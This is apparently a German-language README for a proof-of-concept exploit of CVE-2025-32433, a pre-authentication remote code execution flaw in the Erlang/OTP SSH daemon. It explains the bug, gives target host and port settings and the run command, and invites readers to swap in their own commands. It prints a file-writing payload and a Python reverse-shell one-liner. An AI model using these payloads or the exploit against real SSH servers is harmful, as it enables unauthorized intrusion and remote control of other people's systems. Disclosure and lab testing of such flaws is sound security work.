
Proof-of-Concept-Exploit für CVE-2025-32433, eine Remote Code Execution (RCE) vor der Authentifizierung im Erlang/OTP-SSH-Daemon. Enthält ein Python-Skript zum Senden präparierter SSH-Kanalanfragen und zum Ausführen beliebiger Befehle.
CVE-2025-32433 ist eine Schwachstelle zur Remote-Codeausführung (RCE), die den Erlang/OTP-SSH-Daemon betrifft.
Die Ursache ist eine unsachgemäße Behandlung von SSH-Kanalanfragen vor der Authentifizierung, die von einem Angreifer so gestaltet werden können,
dass vor der Authentifizierung beliebige Befehle ausgeführt werden.
Der enthaltene PoC demonstriert das Senden solcher manipulierter SSH-Pakete; standardmäßig schreibt er /lab.txt auf das Zielsystem, kann aber für andere Befehle angepasst werden.
HOST = "127.0.0.1" # Target IP
PORT = 2222 # Target SSH port
python3 cve-2025-32433.py
Standardmäßig erstellt er /lab.txt mit dem Inhalt pwned.
Ändern Sie das Payload in build_channel_request, um eigene Befehle auszuführen.
# Write a file file:write_file("/lab.txt", <<"pwned">>).Spawn a reverse shell
os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")
SSH_MSG_KEXINIT, die wie ein normaler Handshake aussieht.SSH_MSG_CHANNEL_OPEN und SSH_MSG_CHANNEL_REQUEST mit einem exec-Payload vor der Authentifizierung.Entdeckung und Dokumentation von Matt Keeley (Platform Security). Vielen Dank an ihn für die Veröffentlichung des PoC und die Bereitstellung der Details.